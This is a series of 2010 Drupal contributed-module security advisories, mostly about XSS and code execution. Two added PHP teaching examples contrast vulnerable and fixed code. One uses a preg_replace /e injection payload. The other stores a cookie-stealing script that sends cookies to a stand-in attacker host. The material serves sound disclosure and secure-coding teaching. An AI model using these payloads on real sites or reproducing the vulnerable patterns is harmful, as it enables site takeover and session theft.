* Advisory ID: DRUPAL-SA-CONTRIB-2010-015
* Project: Signwriter (third-party module)
* Version: 5.x, 6.x
* Date: 2010-February-3
* Security risk: Critical
* Exploitable from: Remote
* Vulnerability: Arbitrary code execution
-------- DESCRIPTION
---------------------------------------------------------
The Signwriter module allows the use of TrueType fonts to replace text in
headings, blocks, menus and filtered text. This vulnerability allows a remote
attacker with the ability to create content using an input filter created
with a Signwriter profile to execute arbitrary PHP code on an affected
system. The vulnerability exists because the module calls PHP's preg_replace()
function with the e (eval) modifier, which causes the replacement string,
including text taken from the filtered content, to be executed as PHP code.
-------- VERSIONS AFFECTED
---------------------------------------------------
* Signwriter for Drupal 5.x prior to 5.x-1.6
* Signwriter for Drupal 6.x prior to 6.x-2.0-beta2
Drupal core is not affected. If you do not use the Signwriter module, there is
nothing you need to do.
-------- SOLUTION
------------------------------------------------------------
Upgrade to the latest version:
* If you use Signwriter for Drupal 5.x upgrade to Signwriter 5.x-1.6 [1]
* If you use Signwriter for Drupal 6.x upgrade to Signwriter 6.x-2.0-beta2
[2]
See also the Signwriter page [3].
-------- REPORTED BY
---------------------------------------------------------
* Martin Barbella [4]
-------- FIXED BY
------------------------------------------------------------
* Agileware [5], the module maintainer
-------- CONTACT
-------------------------------------------------------------
The security contact for Drupal can be reached at security at drupal.org or
via the form at http://drupal.org/contact [6].
[1] http://drupal.org/node/702978
[2] http://drupal.org/node/702976
[3] http://drupal.org/project/signwriter
[4] http://drupal.org/user/633600
[5] http://drupal.org/user/89106
[6] http://drupal.org/contact
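The bug class behind this advisory, as an added example that is not Signwriter's own code: a text filter that finds marked-up spans with preg_replace() and uses the e modifier to call a rendering function on each match. The [sw:...] tag syntax, the render_text() helper and the node body are hypothetical stand-ins; only the contrast between the two replace_tags_* functions is the point. The e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so the vulnerable branch only executes on PHP 5.

```php
<?php
// Added example, not Signwriter's code. The [sw:...] tag, render_text()
// and $node_body are hypothetical stand-ins for "a filter that replaces
// marked-up text with a rendered font image".

// Stand-in for the real rendering step (which would build an image); it
// only wraps the text so the result is visible.
function render_text($text) {
  return '<span class="signwriter">'
    . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</span>';
}

// VULNERABLE: with the e modifier preg_replace() eval()s the replacement
// string after substituting backreferences. PHP runs addslashes() on each
// backreference, so a bare quote cannot break out of "$1", but $1 lands
// inside a double-quoted PHP string, and the "{${ ... }}" complex syntax
// is not neutralised by addslashes(): the expression inside it executes.
// Removed in PHP 7, where this call only emits a warning and returns NULL.
function replace_tags_vulnerable($body) {
  return preg_replace('/\[sw:(.*?)\]/e', 'render_text("$1")', $body);
}

// FIXED: preg_replace_callback() hands each match to a real PHP function.
// Nothing from the subject text is ever compiled, so it may contain anything.
function render_match($m) {
  return render_text($m[1]);
}
function replace_tags_fixed($body) {
  return preg_replace_callback('/\[sw:(.*?)\]/', 'render_match', $body);
}

// Constructed input: a node body that an attacker who may use an input
// format carrying the (hypothetical) tag would submit. With /e the code
// that is evaluated is
//   return render_text("{${phpinfo()}}");
// so phpinfo() runs during filtering; any other function call works the
// same way.
$node_body = 'Hello [sw:{${phpinfo()}}] world';

echo replace_tags_fixed($node_body), PHP_EOL;

if (PHP_VERSION_ID < 70000) {
  // Only reachable on PHP 5; demonstrates the execution. Run it only in a
  // throwaway environment and never on attacker-supplied input.
  echo replace_tags_vulnerable($node_body), PHP_EOL;
}
```

When auditing a code base, every preg_replace() whose pattern literal ends in a modifier list containing `e` is a finding of this kind regardless of how innocent the replacement string looks: the backreferences, not the replacement, are what the attacker controls.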
* Advisory ID: DRUPAL-SA-CONTRIB-2010-014
* Project: Node Export (third-party module)
* Version: 5.x, 6.x
* Date: 2010-February-3
* Security risk: Less critical
* Exploitable from: Remote
* Vulnerability: Arbitrary code execution
-------- DESCRIPTION
---------------------------------------------------------
The Node Export module allows users to export and import nodes. The import
operation executes PHP from the supplied export, and Node Export does not
warn administrators that users holding both the "access administration
pages" permission and the "import nodes" permission can therefore execute
arbitrary PHP statements during an import, which is equivalent to full
control of the site.
-------- VERSIONS AFFECTED
---------------------------------------------------
* Node Export for Drupal 5.x prior to 5.x-2.3
* Node Export for Drupal 6.x prior to 6.x-2.19
Drupal core is not affected. If you do not use the Node Export module, there
is nothing you need to do.
-------- SOLUTION
------------------------------------------------------------
Upgrade to the latest version:
* If you use Node Export for Drupal 5.x upgrade to Node Export 5.x-2.3 [1]
* If you use Node Export for Drupal 6.x upgrade to Node Export 6.x-2.19 [2]
Since the "import nodes" permission has been renamed, you will need to grant
the permission to import nodes to authorized users again. See also the Node
Export page [3].
-------- REPORTED BY
---------------------------------------------------------
* mr.baileys [4] of the Drupal Security Team
-------- FIXED BY
------------------------------------------------------------
* danielb [5], the module maintainer
-------- CONTACT
-------------------------------------------------------------
The security contact for Drupal can be reached at security at drupal.org or
via the form at http://drupal.org/contact.
[1] http://drupal.org/node/703246
[2] http://drupal.org/node/703244
[3] http://drupal.org/project/node_export
[4] http://drupal.org/user/383424
[5] http://drupal.org/user/134005
* Advisory ID: DRUPAL-SA-CONTRIB-2010-013
* Project: Menu Breadcrumb (third-party module)
* Version: 6.x
* Date: 2010-February-3
* Security risk: Less critical
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting
-------- DESCRIPTION
---------------------------------------------------------
The Menu Breadcrumb module uses the menu the current page belongs to as the
breadcrumb. The module does not properly sanitize parts of the provided
block, leading to a cross-site scripting (XSS [1]) vulnerability. Such an
attack may lead to a malicious user gaining full administrative access.
Mitigating factors: A user must have a role with the permission /administer
blocks/ to exploit this vulnerability.
-------- VERSIONS AFFECTED
---------------------------------------------------
* Menu Breadcrumb for Drupal 6.x prior to 6.x-1.3
Drupal core is not affected. If you do not use the contributed Menu
Breadcrumb module, there is nothing you need to do.
-------- SOLUTION
------------------------------------------------------------
Upgrade to the latest version:
* If you use Menu Breadcrumb for Drupal 6.x upgrade to Menu Breadcrumb
6.x-1.3 [2]
See also the Menu Breadcrumb project page [3].
-------- REPORTED BY
---------------------------------------------------------
* mr.baileys [4]
-------- FIXED BY
------------------------------------------------------------
* Chris Burgess [5], the module maintainer
-------- CONTACT
-------------------------------------------------------------
The security contact for Drupal can be reached at security at drupal.org or
via the form at http://drupal.org/contact.
[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/703010
[3] http://drupal.org/project/menu_breadcrumb
[4] http://drupal.org/user/383424
[5] http://drupal.org/user/76026
* Advisory ID: DRUPAL-SA-CONTRIB-2010-012
* Project: ODF Import (third-party module)
* Version: 6.x-1.0
* Date: 2010-February-3
* Security risk: Moderately critical
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting
-------- DESCRIPTION
---------------------------------------------------------
The ODF Import module enables users of a Drupal site to import content created
in the ODF format (e.g. using OpenOffice.org). Imported content was always
stored with a fixed input format, regardless of whether the importing user is
permitted to use that format, so a user limited to a restrictive format could
have content rendered through a permissive one, leading to a cross-site
scripting (XSS [1]) vulnerability. Such an attack may lead to a malicious user
gaining full administrative access. Mitigating factors: this only impacts
sites which also use the ODF Import module, where users have the "import odf"
permission.
-------- VERSIONS AFFECTED
---------------------------------------------------
* ODF Import for Drupal 6.x prior to 6.x-1.1
Drupal core is not affected. If you do not use the contributed ODF Import
module, there is nothing you need to do.
-------- SOLUTION
------------------------------------------------------------
Upgrade to the latest version:
* If you use ODF Import for Drupal 6.x upgrade to ODF Import 6.x-1.1 [2]
See also the ODF Import project page [3].
-------- REPORTED BY
---------------------------------------------------------
* Frederic G. Marand [4]
-------- FIXED BY
------------------------------------------------------------
* Vivek Khurana [5], the module maintainer
-------- CONTACT
-------------------------------------------------------------
The security contact for Drupal can be reached at security at drupal.org or
via the form at http://drupal.org/contact.
[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/702470
[3] http://drupal.org/project/odfimport
[4] http://drupal.org/user/27985
[5] http://drupal.org/user/407445
* Advisory ID: DRUPAL-SA-CONTRIB-2010-011
* Project: Feedback (third-party module)
* Version: 5.x, 6.x
* Date: 2010-January-27
* Security risk: Moderately critical
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting
-------- DESCRIPTION
---------------------------------------------------------
The Feedback module enables users and visitors of a Drupal site to quickly
send feedback messages about the currently displayed page. When displaying
reports about submitted feedback, the module does not properly sanitize the
user agent strings recorded by the Browscap module before display, leading to
a cross-site scripting (XSS [1]) vulnerability. Because the User-Agent header
is chosen by the visitor's client, no account is needed to plant the payload;
it executes when a user who can view the feedback reports opens them. Such an
attack may lead to a malicious user gaining full administrative access.
Mitigating factors: this only impacts sites which also use the Browscap module
and have the "Monitor browsers" feature enabled.
-------- VERSIONS AFFECTED
---------------------------------------------------
* Feedback for Drupal 6.x prior to 6.x-2.1
* Feedback for Drupal 5.x prior to 5.x-2.1
Drupal core is not affected. If you do not use the contributed Feedback
module, there is nothing you need to do.
-------- SOLUTION
------------------------------------------------------------
Upgrade to the latest version:
* If you use Feedback for Drupal 6.x upgrade to Feedback 6.x-2.1 [2]
* If you use Feedback for Drupal 5.x upgrade to Feedback 5.x-2.1 [3]
See also the Feedback project page [4].
-------- REPORTED BY
---------------------------------------------------------
* mr.baileys [5]
-------- FIXED BY
------------------------------------------------------------
* Daniel Kudwien [6], the module maintainer
* Dave Reid [7]
-------- CONTACT
-------------------------------------------------------------
The security contact for Drupal can be reached at security at drupal.org or
via the form at http://drupal.org/contact.
[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/697288
[3] http://drupal.org/node/697290
[4] http://drupal.org/project/feedback
[5] http://drupal.org/user/383424
[6] http://drupal.org/user/54136
[7] http://drupal.org/user/53892
* Advisory ID: DRUPAL-SA-CONTRIB-2010-010
* Project: Author Contact (third-party module)
* Version: 5.x, 6.x
* Date: 2010-January-27
* Security risk: Less critical
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting
-------- DESCRIPTION
---------------------------------------------------------
The Author Contact module provides a form to contact the author of the
current post. The module does not properly sanitize parts of the provided
block, leading to a cross-site scripting (XSS [1]) vulnerability. Such an
attack may lead to a malicious user gaining full administrative access. A
user must have a role with the permission /administer blocks/ to exploit this
vulnerability.
-------- VERSIONS AFFECTED
---------------------------------------------------
* Author Contact for Drupal 6.x prior to 6.x-1.3
* Author Contact for Drupal 5.x prior to 5.x-1.3
Drupal core is not affected. If you do not use the contributed Author Contact
module, there is nothing you need to do.
-------- SOLUTION
------------------------------------------------------------
Upgrade to the latest version:
* If you use Author Contact for Drupal 6.x upgrade to Author Contact 6.x-1.3
[2]
* If you use Author Contact for Drupal 5.x upgrade to Author Contact 5.x-1.3
[3]
See also the Author Contact project page [4].
-------- REPORTED BY
---------------------------------------------------------
* mr.baileys [5]
-------- FIXED BY
------------------------------------------------------------
* James Crook [6], the module maintainer
* Benjamin Jeavons [7]
-------- CONTACT
-------------------------------------------------------------
The security contact for Drupal can be reached at security at drupal.org or
via the form at http://drupal.org/contact.
[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/694238
[3] http://drupal.org/node/693896
[4] http://drupal.org/project/authorcontact
[5] http://drupal.org/user/383424
[6] http://drupal.org/user/204495
[7] http://drupal.org/user/91990
* Advisory ID: DRUPAL-SA-CONTRIB-2010-009
* Project: Block Class (third-party module)
* Version: 6.x-1.2, 5.x-1.1
* Date: 2010-January-20
* Security risk: Less critical
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting
-------- DESCRIPTION
---------------------------------------------------------
Block Class module allows users to add classes to any block through the
block's configuration interface. This release includes a fix for a cross-site
scripting (XSS [1]) vulnerability through which JavaScript could be inserted
in the class field of a block's configuration interface.
-------- VERSIONS AFFECTED
---------------------------------------------------
* Block Class module 5.x-1.1 and prior versions
* Block Class module 6.x-1.2 and prior versions
Drupal core is not affected. If you do not use the contributed Block Class
module, there is nothing you need to do.
-------- SOLUTION
------------------------------------------------------------
Install the latest version:
* If you use the Block Class module for Drupal 5.x upgrade to Block Class
5.x-1.2 [2]
* If you use the Block Class module for Drupal 6.x upgrade to Block Class
6.x-1.3 [3]
See also the Block Class [4] page.
-------- REPORTED BY
---------------------------------------------------------
* Didrik Nordström [5]
-------- FIXED BY
------------------------------------------------------------
* Didrik Nordström [6] and Todd Nienkerk [7]
-------- CONTACT
-------------------------------------------------------------
The security contact for Drupal can be reached at security at drupal.org or
via the form at http://drupal.org/contact.
[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/688622
[3] http://drupal.org/node/688624
[4] http://drupal.org/project/block_class
[5] http://drupal.org/user/442208
[6] http://drupal.org/user/442208
[7] http://drupal.org/user/92096
* Advisory ID: DRUPAL-SA-CONTRIB-2010-008
* Project: Recent Comments (third-party module)
* Version: 6.x-1.0, 5.x-1.2
* Date: 2010-January-20
* Security risk: Less Critical
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting
-------- DESCRIPTION
---------------------------------------------------------
The Recent Comments module provides a high-performance, fully themable block
of recent comments. This release includes a fix for a cross-site scripting
(XSS [1]) vulnerability in which JavaScript could be inserted in the title of
the Recent Comments block via a custom block title interface. This custom
title interface has been removed, as Drupal 5.x and later allow overriding a
block's title from its configuration screen.
-------- VERSIONS AFFECTED
---------------------------------------------------
* Recent Comments module 5.x-1.2 and prior versions
* Recent Comments module 6.x-1.0 and prior versions
Drupal core is not affected. If you do not use the contributed Recent
Comments module, there is nothing you need to do.
-------- SOLUTION
------------------------------------------------------------
Install the latest version:
* If you use the Recent Comments module for Drupal 5.x upgrade to Recent
Comments 5.x-1.3 [2]
* If you use the Recent Comments module for Drupal 6.x upgrade to Recent
Comments 6.x-1.1 [3]
See also the Recent Comments [4] page.
-------- REPORTED BY
---------------------------------------------------------
* Dylan Tack [5] of the Drupal Security Team
-------- FIXED BY
------------------------------------------------------------
* Dylan Tack [6] of the Drupal Security Team and Todd Nienkerk [7]
-------- CONTACT
-------------------------------------------------------------
The security contact for Drupal can be reached at security at drupal.org or
via the form at http://drupal.org/contact.
[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/688636
[3] http://drupal.org/node/688632
[4] http://drupal.org/project/recent_comments
[5] http://drupal.org/user/96647
[6] http://drupal.org/user/96647
[7] http://drupal.org/user/92096
* Advisory ID: DRUPAL-SA-CONTRIB-2010-007
* Project: Control Panel (third-party module)
* Version: 5.x, 6.x
* Date: 2010-January-20
* Security risk: Less Critical
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting
-------- DESCRIPTION
---------------------------------------------------------
The Control Panel module enables users to add a new graphical control panel
page. The module does not sanitize some of the user-supplied data before
displaying it, leading to a Cross Site Scripting (XSS [1]) vulnerability.
Only users with the 'administer blocks' permission are able to exploit this
vulnerability.
-------- VERSIONS AFFECTED
---------------------------------------------------
* Control Panel module 5.x-1.5 and prior versions
* Control Panel module 6.x-1.2 and prior versions
Drupal core is not affected. If you do not use the contributed Control Panel
[2] module, there is nothing you need to do.
-------- SOLUTION
------------------------------------------------------------
The Drupal 5.x version of this module is no longer supported and should be
disabled. For Drupal 6.x, install the latest version:
* If you use Control Panel module for Drupal 6.x upgrade to Control Panel
6.x-1.3 [3]
See also the Control Panel project page [4].
-------- REPORTED BY
---------------------------------------------------------
* Dylan Wilder-Tack [5] of the Drupal Security Team
-------- FIXED BY
------------------------------------------------------------
* Dylan Wilder-Tack [6]
-------- CONTACT
-------------------------------------------------------------
The security team for Drupal can be reached at security at drupal.org or via
the form at http://drupal.org/contact.
[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/project/controlpanel
[3] http://drupal.org/node/686428
[4] http://drupal.org/project/controlpanel
[5] http://drupal.org/user/96647
[6] http://drupal.org/user/96647
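The pattern shared by the block-configuration advisories above (Menu Breadcrumb, Author Contact, Block Class, Recent Comments and Control Panel), as an added example that is not code from any of those modules: a value entered on a block's configure form by a user holding 'administer blocks' is concatenated into the page unescaped. The module name "example", the 'example_intro' setting and the payload are hypothetical. variable_get(), variable_set() and check_plain() are stubbed with the same behaviour they have in Drupal 6 so the script runs outside Drupal; inside Drupal the stubs are skipped.

```php
<?php
// Added example, not code from any of the modules in these advisories.
// "example", 'example_intro' and the payload are hypothetical. The three
// stubs below mirror Drupal 6 behaviour so this runs as a plain script.

if (!function_exists('variable_get')) {
  $GLOBALS['example_conf'] = array();
  function variable_set($name, $value) {
    $GLOBALS['example_conf'][$name] = $value;
  }
  function variable_get($name, $default) {
    return isset($GLOBALS['example_conf'][$name]) ? $GLOBALS['example_conf'][$name] : $default;
  }
  // Drupal's check_plain() is htmlspecialchars() with ENT_QUOTES and UTF-8.
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}

// Drupal 6 hook_block() as a module would write it: 'configure' builds the
// settings form, 'save' stores what was submitted, 'view' renders the block.
function example_block($op = 'list', $delta = 0, $edit = array()) {
  switch ($op) {
    case 'list':
      return array(0 => array('info' => 'Example block'));
    case 'configure':
      return array('example_intro' => array(
        '#type' => 'textfield',
        '#title' => 'Intro text',
        '#default_value' => variable_get('example_intro', ''),
      ));
    case 'save':
      variable_set('example_intro', $edit['example_intro']);
      return;
    case 'view':
      // VULNERABLE: the stored setting goes into the markup as-is.
      $intro = variable_get('example_intro', '');
      return array(
        'subject' => 'Example',
        'content' => '<p class="intro">' . $intro . '</p>',
      );
  }
}

// FIXED: escape on output. check_plain() renders the setting as text;
// filter_xss_admin() is the Drupal 6 choice if limited markup is wanted.
function example_block_fixed($op = 'list', $delta = 0, $edit = array()) {
  if ($op != 'view') {
    return example_block($op, $delta, $edit);
  }
  $intro = variable_get('example_intro', '');
  return array(
    'subject' => 'Example',
    'content' => '<p class="intro">' . check_plain($intro) . '</p>',
  );
}

// Constructed input: what a user with 'administer blocks' (and nothing
// else) submits on the configure form. The script runs in the browser of
// every user who views a page carrying the block, including uid 1.
$payload = '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>';
example_block('save', 0, array('example_intro' => $payload));

$vulnerable = example_block('view');
$fixed = example_block_fixed('view');
echo $vulnerable['content'], PHP_EOL;  // script element reaches the browser
echo $fixed['content'], PHP_EOL;       // rendered as literal text
```

The advisories rate these "less critical" because 'administer blocks' is already a high-trust permission, but the fix is the same as for any stored XSS: sanitize at the point of output, not at the point of storage, so that every path that renders the setting is covered.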
* Advisory ID: DRUPAL-SA-CONTRIB-2010-006
* Project: Bibliography (third-party module)
* Version: 5.x, 6.x
* Date: 2010-January-13
* Security risk: Moderately Critical
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting
-------- DESCRIPTION
---------------------------------------------------------
The Bibliography module enables users to manage and display lists of
scholarly publications. The module does not sanitize some of the
user-supplied data before displaying it, leading to a Cross Site Scripting
(XSS [1]) vulnerability. Only users with the 'administer biblio' permission
are able to exploit this vulnerability.
-------- VERSIONS AFFECTED
---------------------------------------------------
* Bibliography module 5.x-1.17 and prior versions
* Bibliography module 6.x-1.9 and prior versions
Drupal core is not affected. If you do not use the contributed Bibliography
[2] module, there is nothing you need to do.
-------- SOLUTION
------------------------------------------------------------
Install the latest version:
* If you use Bibliography for Drupal 5.x upgrade to Bibliography 5.x-1.18
[3]
* If you use Bibliography for Drupal 6.x upgrade to Bibliography 6.x-1.10
[4]
See also the Bibliography project page [5].
-------- REPORTED BY
---------------------------------------------------------
* grendzy [6] of the Drupal Security Team.
-------- FIXED BY
------------------------------------------------------------
* Ron Jerome [7], the Bibliography project maintainer
-------- CONTACT
-------------------------------------------------------------
The security team for Drupal can be reached at security at drupal.org or via
the form at http://drupal.org/contact.
[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/project/biblio
[3] http://drupal.org/node/682694
[4] http://drupal.org/node/682696
[5] http://drupal.org/project/biblio
[6] http://drupal.org/user/96647
[7] http://drupal.org/user/54997